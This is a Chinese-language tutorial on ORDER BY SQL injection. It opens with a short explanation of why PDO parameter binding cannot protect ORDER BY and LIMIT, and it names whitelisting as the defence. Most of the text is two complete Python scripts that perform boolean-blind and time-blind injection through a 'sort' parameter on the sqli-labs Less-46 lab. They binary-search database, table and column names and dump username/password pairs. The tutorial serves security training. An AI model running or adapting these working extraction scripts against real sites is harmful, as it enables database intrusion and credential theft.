
order by布尔盲注、时间盲注

使用 PDO 预处理语句时,ORDER BY 的列名/排序方向以及 LIMIT 的数值无法通过占位符绑定(绑定值会被当作字符串字面量处理),开发者往往直接把用户输入拼接到这些位置,因此即使其他位置都做了参数化,这里仍可能存在 SQL 注入。正确的防御是对列名和排序方向做白名单校验、对 LIMIT 的偏移/数量做整数强制转换,而不是依赖参数绑定。

案例:sqli-labs 靶场的 Less-46(`sort` 参数被直接拼入 ORDER BY,页面按排序结果回显 users 表)

布尔盲注:

import requests
from lxml import html


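def get_id_one(URL, paload):
    """Send one probe request and return the first cell of the first result row.

    Less-46 splices the ``sort`` query parameter into ``ORDER BY`` and renders
    the sorted ``users`` table, so the ``id`` shown in row 1 reveals which
    branch of an injected ``if(...)`` expression was chosen.

    Args:
        URL: base URL of the vulnerable page.
        paload: query-string dict carrying the ``sort`` payload (parameter
            name kept as-is for compatibility with existing callers).

    Returns:
        The stripped text of ``//table//tr[1]/td[1]``.

    Raises:
        IndexError: when the page contains no table row at all (e.g. the
            payload caused a SQL error), so a broken payload fails loudly
            instead of being misread as a boolean answer.
    """
    res = requests.get(url=URL, params=paload)
    tree = html.fromstring(res.content)
    return tree.xpath('//table//tr[1]/td[1]/text()')[0].strip()


def search_char(oracle, low=0, high=128):
    """Binary-search a single character code through a boolean oracle.

    ``oracle(mid)`` must answer whether the unknown code is strictly greater
    than ``mid``. The half-open interval ``[low, high)`` is halved until one
    value remains, i.e. about ceil(log2(high - low)) oracle calls per
    character.

    The search starts at 0 (the original loops started at 32) so that the
    value 0 -- what MySQL's ``ascii(substr(...))`` yields past the end of the
    string or for NULL -- can be recognised as "no more data" instead of being
    reported as a space.

    Args:
        oracle: callable ``int -> bool`` implementing "code > mid".
        low: inclusive lower bound of the candidate codes.
        high: exclusive upper bound of the candidate codes.

    Returns:
        The code in ``[low, high)`` consistent with the oracle's answers
        (``high`` itself if every answer was True).
    """
    while high > low:
        mid = (low + high) // 2
        if oracle(mid):
            low = mid + 1  # the answer lies strictly above mid
        else:
            high = mid  # the answer is mid or below
    return low


def blind_extract(URL, expr, max_len, label):
    """Recover the string value of MySQL expression ``expr`` one character at a time.

    For position ``i`` the injected ``sort`` value is
    ``if((ascii(substr(<expr>,i,1))>mid),id,username) -- ``: ordering by
    ``id`` shows the row with id 1 first while ordering by ``username`` shows
    a different row first (holds for the stock sqli-labs data -- verify
    against the target). That single cell is the boolean fed to
    ``search_char``.

    Args:
        URL: base URL of the vulnerable page.
        expr: MySQL scalar expression, e.g. ``database()`` or a parenthesised
            subquery; it is spliced verbatim into the payload.
        max_len: maximum number of characters to recover.
        label: prefix printed in front of the partial result after every
            character, mirroring the original progress output.

    Returns:
        The recovered text. Extraction stops early when a position resolves
        to code 0 (end of string or NULL), so no padding spaces are appended.
    """
    def is_greater(i, mid):
        paload = {
            "sort": f"if((ascii(substr({expr},{i},1))>{mid}),id,username) -- "}
        return get_id_one(URL, paload) == "1"

    recovered = []
    for i in range(1, max_len + 1):
        # bind i explicitly so the closure does not depend on the loop variable
        code = search_char(lambda mid, i=i: is_greater(i, mid))
        if code == 0:
            break
        recovered.append(chr(code))
        print(label + "".join(recovered))
    return "".join(recovered)


def get_database(URL, max_len=9):
    """Recover ``database()``; the default length bound matches the original loop."""
    return blind_extract(URL, "database()", max_len, "数据库名称:")


def get_table(URL, max_len=31, schema="security"):
    """Recover the comma-joined table names of ``schema``.

    ``schema`` is spliced into the payload as a double-quoted literal, which
    MySQL accepts unless ANSI_QUOTES is enabled on the target.
    """
    expr = (f'(select group_concat(table_name) from information_schema.tables '
            f'where table_schema="{schema}")')
    return blind_extract(URL, expr, max_len, "表的名称:")


def get_column(URL, max_len=31, schema="security", table="users"):
    """Recover the comma-joined column names of ``schema.table`` (spliced as-is)."""
    expr = (f'(select group_concat(column_name) from information_schema.columns '
            f'where table_schema="{schema}" and table_name="{table}")')
    return blind_extract(URL, expr, max_len, "列的名称:")


def get_result(URL, max_len=31):
    """Recover ``username>password`` pairs from ``users`` (``0x3e`` is ``>``).

    The parameter was previously misspelled ``URl`` and the body silently
    read the module-level ``URL`` instead; it now uses its own argument.
    """
    expr = "(select group_concat(username,0x3e,password) from users)"
    return blind_extract(URL, expr, max_len, "用户名及密码信息:")


if __name__ == '__main__':
    URL = "http://localhost/Less-46/"
    # Enumerate top-down (database -> tables -> columns -> rows); each call is
    # independent, so uncomment whichever stage is needed.
    # get_database(URL)
    # get_table(URL)
    # get_column(URL)
    get_result(URL)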

 

时间盲注:

import datetime
import time

import requests


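def search_char(oracle, low=0, high=128):
    """Binary-search a single character code through a boolean oracle.

    ``oracle(mid)`` must answer whether the unknown code is strictly greater
    than ``mid``. The half-open interval ``[low, high)`` is halved until one
    value remains, i.e. about ceil(log2(high - low)) oracle calls per
    character.

    The search starts at 0 (the original loops started at 32) so that the
    value 0 -- what MySQL's ``ascii(substr(...))`` yields past the end of the
    string or for NULL -- can be recognised as "no more data" instead of being
    reported as a space.

    Args:
        oracle: callable ``int -> bool`` implementing "code > mid".
        low: inclusive lower bound of the candidate codes.
        high: exclusive upper bound of the candidate codes.

    Returns:
        The code in ``[low, high)`` consistent with the oracle's answers
        (``high`` itself if every answer was True).
    """
    while high > low:
        mid = (low + high) // 2
        if oracle(mid):
            low = mid + 1  # the answer lies strictly above mid
        else:
            high = mid  # the answer is mid or below
    return low


def time_extract(URL, expr, max_len, label, delay=0.2, threshold=3.0):
    """Recover the string value of MySQL expression ``expr`` via response timing.

    For position ``i`` the injected ``sort`` value is
    ``if((ascii(substr(<expr>,i,1))>mid),sleep(<delay>),id) -- ``. Because
    the expression lives in ``ORDER BY`` it is evaluated for each row the
    server sorts, so the delay you observe is roughly ``delay`` times the row
    count rather than ``delay`` itself; ``threshold`` has to sit above the
    page's normal latency and below that product. With the original numbers
    (0.2 s and 3 s) a table of only a dozen rows may never cross the
    threshold -- if nothing is printed, lower ``threshold`` or raise
    ``delay``.

    Timing uses ``time.perf_counter`` (monotonic) rather than wall-clock
    ``datetime.now``, so clock adjustments cannot flip an answer.

    Args:
        URL: base URL of the vulnerable page.
        expr: MySQL scalar expression, spliced verbatim into the payload.
        max_len: maximum number of characters to recover.
        label: prefix printed in front of the partial result after every
            character, mirroring the original progress output.
        delay: argument handed to MySQL ``sleep()`` in the true branch.
        threshold: elapsed seconds at or above which a probe counts as True.

    Returns:
        The recovered text. Extraction stops early when a position resolves
        to code 0 (end of string, NULL, or a threshold that never trips).
    """
    def is_greater(i, mid):
        paload = {
            "sort": f"if((ascii(substr({expr},{i},1))>{mid}),sleep({delay}),id) -- "}
        started = time.perf_counter()
        requests.get(url=URL, params=paload)
        return time.perf_counter() - started >= threshold

    recovered = []
    for i in range(1, max_len + 1):
        # bind i explicitly so the closure does not depend on the loop variable
        code = search_char(lambda mid, i=i: is_greater(i, mid))
        if code == 0:
            break
        recovered.append(chr(code))
        print(label + "".join(recovered))
    return "".join(recovered)


def get_database(URL, max_len=9):
    """Recover ``database()``; the default length bound matches the original loop."""
    return time_extract(URL, "database()", max_len, "数据库名称:")


def get_table(URL, max_len=31, schema="security"):
    """Recover the comma-joined table names of ``schema``.

    ``schema`` is spliced into the payload as a double-quoted literal, which
    MySQL accepts unless ANSI_QUOTES is enabled on the target.
    """
    expr = (f'(select group_concat(table_name) from information_schema.tables '
            f'where table_schema="{schema}")')
    return time_extract(URL, expr, max_len, "表的名称:")


def get_column(URL, max_len=31, schema="security", table="users"):
    """Recover the comma-joined column names of ``schema.table`` (spliced as-is)."""
    expr = (f'(select group_concat(column_name) from information_schema.columns '
            f'where table_schema="{schema}" and table_name="{table}")')
    return time_extract(URL, expr, max_len, "列的名称:")


def get_result(URL, max_len=31):
    """Recover ``username>password`` pairs from ``users`` (``0x3e`` is ``>``).

    The parameter was previously misspelled ``URl`` and the body silently
    read the module-level ``URL`` instead; it now uses its own argument.
    """
    expr = "(select group_concat(username,0x3e,password) from users)"
    return time_extract(URL, expr, max_len, "用户名及密码信息:")


if __name__ == '__main__':
    URL = "http://localhost/Less-46/"
    # Enumerate top-down (database -> tables -> columns -> rows); each call is
    # independent, so uncomment whichever stage is needed.
    # get_database(URL)
    # get_table(URL)
    # get_column(URL)
    get_result(URL)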
